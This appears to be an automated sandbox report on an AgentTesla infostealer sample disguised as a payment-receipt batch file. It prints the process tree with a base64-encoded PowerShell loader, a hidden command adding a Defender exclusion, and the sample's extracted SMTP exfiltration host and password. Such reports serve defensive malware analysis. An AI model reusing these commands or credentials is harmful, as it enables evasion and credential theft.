agenttesla | 532c430557d989ef518fa43b5757d39785050a64945c8c95e2f739f88d76ea66

General

Target

informaci�n del recibo de pago.bat
Size

952KB
MD5

504fba0abe6add67db0789d3d633d023
SHA1

9d378def271f305b024bd1894516dc8cee68639c
SHA256

532c430557d989ef518fa43b5757d39785050a64945c8c95e2f739f88d76ea66
SHA512

01156ed686083a1b163661e3536fa438c38378687abc682597c1ffaf9872d1ae5004354992a907e3c3be1b9f805676e1dc3a3c07f6e06a1aff7448602a65127f
SSDEEP

24576:ZjAnOhGCf0fFcQv+VJMUUwlEeGoP7lWVy6x/GF:siYGIUUALWVFsF

Score

10^/10

agenttesla collection keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.tecnosilos.com.py
Port:
587
Username:
[email protected]
Password:
u(B[W[~XtT8,

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.tecnosilos.com.py
Port:
587
Username:
[email protected]
Password:
u(B[W[~XtT8,
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Executes dropped EXE 1 IoCs

Processes:

Blpgid.png

pid process

1840 Blpgid.png
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
1840	Blpgid.png

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

Blpgid.png

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Blpgid.png
Key opened	\REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Blpgid.png
Key opened	\REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Blpgid.png

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 api.ipify.org
2 api.ipify.org
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

Blpgid.pngpowershell.exe

pid process

1840 Blpgid.png
1840 Blpgid.png
1840 Blpgid.png
1840 Blpgid.png
1840 Blpgid.png
2092 powershell.exe
2092 powershell.exe
2092 powershell.exe

flow	ioc
1	api.ipify.org
2	api.ipify.org

pid	process
1840	Blpgid.png
1840	Blpgid.png
1840	Blpgid.png
1840	Blpgid.png
1840	Blpgid.png
2092	powershell.exe
2092	powershell.exe
2092	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

Blpgid.pngpowershell.exe

description	pid	process
Token: SeDebugPrivilege	1840	Blpgid.png
Token: SeDebugPrivilege	1840	Blpgid.png
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeIncreaseQuotaPrivilege	2092	powershell.exe
Token: SeSecurityPrivilege	2092	powershell.exe
Token: SeTakeOwnershipPrivilege	2092	powershell.exe
Token: SeLoadDriverPrivilege	2092	powershell.exe
Token: SeSystemProfilePrivilege	2092	powershell.exe
Token: SeSystemtimePrivilege	2092	powershell.exe
Token: SeProfSingleProcessPrivilege	2092	powershell.exe
Token: SeIncBasePriorityPrivilege	2092	powershell.exe
Token: SeCreatePagefilePrivilege	2092	powershell.exe
Token: SeBackupPrivilege	2092	powershell.exe
Token: SeRestorePrivilege	2092	powershell.exe
Token: SeShutdownPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeSystemEnvironmentPrivilege	2092	powershell.exe
Token: SeRemoteShutdownPrivilege	2092	powershell.exe
Token: SeUndockPrivilege	2092	powershell.exe
Token: SeManageVolumePrivilege	2092	powershell.exe
Token: 33	2092	powershell.exe
Token: 34	2092	powershell.exe
Token: 35	2092	powershell.exe
Token: 36	2092	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 5040 wrote to memory of 4908	5040	cmd.exe	cmd.exe
PID 5040 wrote to memory of 4908	5040	cmd.exe	cmd.exe
PID 4908 wrote to memory of 1996	4908	cmd.exe	cmd.exe
PID 4908 wrote to memory of 1996	4908	cmd.exe	cmd.exe
PID 4908 wrote to memory of 508	4908	cmd.exe	xcopy.exe
PID 4908 wrote to memory of 508	4908	cmd.exe	xcopy.exe
PID 4908 wrote to memory of 2780	4908	cmd.exe	cmd.exe
PID 4908 wrote to memory of 2780	4908	cmd.exe	cmd.exe
PID 4908 wrote to memory of 4564	4908	cmd.exe	xcopy.exe
PID 4908 wrote to memory of 4564	4908	cmd.exe	xcopy.exe
PID 4908 wrote to memory of 1840	4908	cmd.exe	Blpgid.png
PID 4908 wrote to memory of 1840	4908	cmd.exe	Blpgid.png

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

Blpgid.png

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Blpgid.png

outlook_win_path 1 IoCs

Processes:

Blpgid.png

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3802588206-2855991289-4225012448-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Blpgid.png

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\informaci�n del recibo de pago.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\informaci�n del recibo de pago.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\system32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Blpgid.png
3⤵
PID:508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
3⤵
PID:1996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
3⤵
PID:2780

C:\Windows\system32\xcopy.exe
xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\informaci�n del recibo de pago.bat" C:\Users\Admin\AppData\Local\Temp\Blpgid.png.bat
3⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\Blpgid.png
C:\Users\Admin\AppData\Local\Temp\Blpgid.png -win 1 -enc JABUAHYAZgBsAHIAcQBtAG8AIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHYAZgBsAHIAcQBtAG8AKQA7ACQASABjAHoAZgBiAGsAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABQAGkAaABkAGQAYgBtAHcAcwBxACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEgAYwB6AGYAYgBrAGgALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAFAAaQBoAGQAZABiAG0AdwBzAHEALgBDAG8AcAB5AFQAbwAoACAAJABvAHUAdABwAHUAdAAgACkAOwAkAFAAaQBoAGQAZABiAG0AdwBzAHEALgBDAGwAbwBzAGUAKAApADsAJABIAGMAegBmAGIAawBoAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQASwBkAHEAcAB0AGEAbgB2AGMAaQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABLAGQAcQBwAHQAYQBuAHYAYwBpACkAOwAgACQAVABnAHEAcwB4AHMAdQByAHEAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABLAGQAcQBwAHQAYQBuAHYAYwBpACkAOwAgACQAUgBsAGwAaABhACAAPQAgACQAVABnAHEAcwB4AHMAdQByAHEAdgAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEUAcQBxAGEAYQBwAGYAcAByAHEAIAA9ACAAJABSAGwAbABoAGEALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQBbADAAXQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

3

T1552

Credentials In Files

3

T1552.001

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Blpgid.png

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Blpgid.png.bat

Filesize
952KB

MD5
504fba0abe6add67db0789d3d633d023

SHA1
9d378def271f305b024bd1894516dc8cee68639c

SHA256
532c430557d989ef518fa43b5757d39785050a64945c8c95e2f739f88d76ea66

SHA512
01156ed686083a1b163661e3536fa438c38378687abc682597c1ffaf9872d1ae5004354992a907e3c3be1b9f805676e1dc3a3c07f6e06a1aff7448602a65127f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxuam1g2.s04.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1840-55-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-17-0x000001BD343A0000-0x000001BD343C2000-memory.dmp

Filesize
136KB

Download
memory/1840-129-0x000001BD350F0000-0x000001BD35140000-memory.dmp

Filesize
320KB

Download
memory/1840-16-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-18-0x000001BD348C0000-0x000001BD349C2000-memory.dmp

Filesize
1.0MB

Download
memory/1840-21-0x000001BD349D0000-0x000001BD34A46000-memory.dmp

Filesize
472KB

Download
memory/1840-15-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-12-0x000001BD343D0000-0x000001BD34452000-memory.dmp

Filesize
520KB

Download
memory/1840-37-0x000001BD345D0000-0x000001BD3469A000-memory.dmp

Filesize
808KB

Download
memory/1840-44-0x000001BD34C50000-0x000001BD34CB6000-memory.dmp

Filesize
408KB

Download
memory/1840-46-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-48-0x000001BD34E40000-0x000001BD34E87000-memory.dmp

Filesize
284KB

Download
memory/1840-56-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-13-0x00007FF9E3830000-0x00007FF9E421C000-memory.dmp

Filesize
9.9MB

Download
memory/1840-193-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-14-0x000001BD34360000-0x000001BD34370000-memory.dmp

Filesize
64KB

Download
memory/1840-53-0x000001BD35030000-0x000001BD35074000-memory.dmp

Filesize
272KB

Download
memory/1840-192-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-191-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-186-0x000001BD35140000-0x000001BD35180000-memory.dmp

Filesize
256KB

Download
memory/1840-185-0x000001BD344C0000-0x000001BD344D0000-memory.dmp

Filesize
64KB

Download
memory/1840-179-0x00007FF9E3830000-0x00007FF9E421C000-memory.dmp

Filesize
9.9MB

Download
memory/2092-178-0x000001456DAA0000-0x000001456DABE000-memory.dmp

Filesize
120KB

Download
memory/2092-180-0x000001456D6A0000-0x000001456D6B0000-memory.dmp

Filesize
64KB

Download
memory/2092-184-0x00007FF9E3830000-0x00007FF9E421C000-memory.dmp

Filesize
9.9MB

Download
memory/2092-157-0x000001456DF00000-0x000001456DF4A000-memory.dmp

Filesize
296KB

Download
memory/2092-156-0x000001456D6A0000-0x000001456D6B0000-memory.dmp

Filesize
64KB

Download
memory/2092-141-0x000001456D6A0000-0x000001456D6B0000-memory.dmp

Filesize
64KB

Download
memory/2092-140-0x000001456D6A0000-0x000001456D6B0000-memory.dmp

Filesize
64KB

Download
memory/2092-139-0x00007FF9E3830000-0x00007FF9E421C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads